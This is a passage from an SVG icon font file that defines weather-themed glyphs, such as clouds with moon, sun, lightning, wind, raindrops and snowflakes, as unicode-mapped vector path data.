<glyph unicode="&#xeae3;" glyph-name="cloud-moon-snow2" d="M808.798 624.173v0 0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232zM783.265 644.186c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0 0zM320 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM416 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM544 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM640 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM736 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0z" />
<glyph unicode="&#xeae4;" glyph-name="cloud-lightning" d="M546.134 288h81.065l-195.199-195.2 47.317 131.2h-82.516l73.598 192h124.801l-49.065-128zM608 224l96 96h-112l48 128h-192l-84-224h-107.91c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-191.91zM576 192h224.018c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735v0c-1.462 95.941-79.69 173.265-175.979 173.265-33.877 0-65.518-9.571-92.367-26.157-40.84 54.724-106.099 90.157-179.633 90.157-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h177.472l-81.455-224 224 224z" />
<glyph unicode="&#xeae5;" glyph-name="cloud-lightning2" d="M546.134 288h81.065l-195.199-195.2 47.317 131.2h-82.516l73.598 192h124.801l-49.065-128zM576 192h224.018c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735v0c-1.462 95.941-79.69 173.265-175.979 173.265-33.877 0-65.518-9.571-92.367-26.157-40.84 54.724-106.099 90.157-179.633 90.157-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169v0c-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h177.472l-81.455-224 224 224z" />
<glyph unicode="&#xeae6;" glyph-name="cloud-sun-lightning" d="M546.134 288l49.065 128h-124.801l-73.598-192h82.516l-47.317-131.2 195.199 195.2h-81.065zM608 224h191.91c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h107.91l84 224h192l-48-128h112l-96-96zM433.455 192h-177.472c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-224.018l-224-224 81.455 224zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0 0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeae7;" glyph-name="cloud-sun-lightning2" d="M546.134 288l49.065 128h-124.801l-73.598-192h82.516l-47.317-131.2 195.199 195.2h-81.065zM433.455 192h-177.472c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-224.018l-224-224 81.455 224zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0 0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeae8;" glyph-name="cloud-moon-lightning" d="M546.134 288l49.065 128h-124.801l-73.598-192h82.516l-47.317-131.2 195.199 195.2h-81.065zM608 224h191.91c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h107.91l84 224h192l-48-128h112l-96-96zM433.455 192h-177.472c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232v0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-224.018l-224-224 81.455 224zM783.265 644.014c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0 0z" />
<glyph unicode="&#xeae9;" glyph-name="cloud-moon-lightning2" d="M546.134 288l49.065 128h-124.801l-73.598-192h82.516l-47.317-131.2 195.199 195.2h-81.065zM433.455 192h-177.472c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232v0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-224.018l-224-224 81.455 224zM783.265 644.014c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0 0z" />
<glyph unicode="&#xeaea;" glyph-name="cloud-wind" d="M227.232 668.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0 0zM863.979 690.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM960 224c0 70.692-57.451 128-128 128-70.692 0-128-57.261-128-128h32c0 53.019 43.089 96 96 96 53.019 0 96-43.089 96-96 0-53.019-42.98-96-96.254-96h-735.746v-32h736.049c70.665 0 127.951 57.451 127.951 128v0zM672 256c0 53.019-43.089 96-96 96-53.019 0-96-42.946-96-95.725v-0.275h32c0 35.346 28.407 64 64 64 35.346 0 64-28.407 64-64 0-35.346-28.706-64-64.187-64h-383.813v-32h384.018c53.009 0 95.982 43.089 95.982 96v0zM800 0c0-35.346-28.407-64-64-64v0c-35.346 0-64 28.631-64 63.816v0.184h32c0-17.673 14.204-32 32-32v0c17.673 0 32 14.204 32 32v0c0 17.673-14.365 32-32.239 32h-447.761v32h448.19c35.241 0 63.81-28.407 63.81-64v0 0z" />
<glyph unicode="&#xeaeb;" glyph-name="cloud-wind2" d="M863.979 690.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM960 224c0 70.692-57.451 128-128 128-70.692 0-128-57.261-128-128h32c0 53.019 43.089 96 96 96 53.019 0 96-43.089 96-96 0-53.019-42.98-96-96.254-96h-735.746v-32h736.049c70.665 0 127.951 57.451 127.951 128v0zM672 256c0 53.019-43.089 96-96 96-53.019 0-96-42.946-96-95.725v-0.275h32c0 35.346 28.407 64 64 64 35.346 0 64-28.407 64-64 0-35.346-28.706-64-64.187-64h-383.813v-32h384.018c53.009 0 95.982 43.089 95.982 96v0zM800 0c0-35.346-28.407-64-64-64v0c-35.346 0-64 28.631-64 63.816v0.184h32c0-17.673 14.204-32 32-32v0c17.673 0 32 14.204 32 32v0c0 17.673-14.365 32-32.239 32h-447.761v32h448.19c35.241 0 63.81-28.407 63.81-64v0 0z" />
<glyph unicode="&#xeaec;" glyph-name="cloud-raindrops" d="M227.232 476.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0zM863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM224 36.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM256.305 38.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM448 4.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM480.305 6.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM672 36.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM704.305 38.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0z" />
<glyph unicode="&#xeaed;" glyph-name="cloud-raindrops2" d="M863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0zM224 36.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM448 4.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM672 36.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0z" />
<glyph unicode="&#xeaee;" glyph-name="cloud-sun-raindrops" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM798.509 632.988c0.983 7.531 1.491 15.212 1.491 23.012 0 97.202-78.798 176-176 176-70.49 0-131.301-41.44-159.401-101.287v0c-15.648 3.461-31.91 5.287-48.599 5.287-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.826 54.236-26.185 102.522-65.47 134.253v0 0zM767.966 652.827v0 0c-23.994 12.259-51.172 19.173-79.966 19.173-33.877 0-65.518-9.571-92.367-26.157-25.253 33.838-59.843 60.3-99.953 75.57 23.827 46.648 72.344 78.586 128.319 78.586 79.529 0 144-64.471 144-144 0-1.060-0.011-2.118-0.034-3.173zM224 36.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM256.305 38.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM448 4.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM480.305 6.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM672 36.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM704.305 38.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeaef;" glyph-name="cloud-sun-raindrops2" d="M798.509 632.988v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0zM224 36.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM448 4.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM672 36.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeaf0;" glyph-name="cloud-moon-raindrops" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM808.798 624c24.049 22.704 41.701 52.11 49.97 85.232 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-13.674 1.559-26.984 4.51-39.761-30.227 15.202-64.369 23.761-100.51 23.761-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.752 49.341-21.807 93.757-55.181 125.265v0 0zM783.265 644.014v0 0c-27.458 17.709-60.162 27.986-95.265 27.986-33.877 0-65.518-9.571-92.367-26.157-9.765 13.085-20.926 25.066-33.262 35.725-11.699 20.822-18.371 44.848-18.371 70.432 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-8.243-23.417-22.368-44.061-40.602-60.159zM224 36.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM256.305 38.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM448 4.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM480.305 6.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0zM672 36.571v0c0-35.657 26.682-68.571 80.337-68.571s79.663 35.657 79.663 68.571c0 46.195-79.663 123.429-79.663 123.429s-80.337-77.233-80.337-123.429zM704.305 38.4c0 22.399 48.032 74.275 48.032 74.275s48.065-51.876 48.065-74.275c0-24.071-21.422-38.4-48.065-38.4s-48.032 10.408-48.032 38.4v0z" />
<glyph unicode="&#xeaf1;" glyph-name="cloud-moon-raindrops2" d="M808.798 624v0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232zM783.265 644.014c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0zM224 36.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM448 4.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0zM672 36.571c0 46.195 80.337 123.429 80.337 123.429s79.663-77.233 79.663-123.429c0-32.915-26.008-68.571-79.663-68.571s-80.337 32.915-80.337 68.571v0z" />
<glyph unicode="&#xeaf2;" glyph-name="cloud-snowflakes" d="M227.232 476.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0zM863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM352 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM736 107.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 18.18v-36.361c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v36.361l31.489-18.18c7.617-4.398 17.504-1.536 21.793 5.893 4.418 7.653 2.046 17.294-5.793 21.82l-31.489 18.18 31.489 18.18c7.617 4.398 10.082 14.391 5.793 21.82-4.418 7.653-13.954 10.419-21.793 5.893l-31.489-18.18zM544 75.713v36.361c0 8.796-7.422 15.926-16 15.926-8.837 0-16-6.875-16-15.926v-36.361l-31.489 18.18c-7.617 4.398-17.504 1.536-21.793-5.893-4.418-7.653-2.046-17.294 5.793-21.82l31.489-18.18-31.489-18.18c-7.617-4.398-10.082-14.391-5.793-21.82 4.418-7.653 13.954-10.419 21.793-5.893l31.489 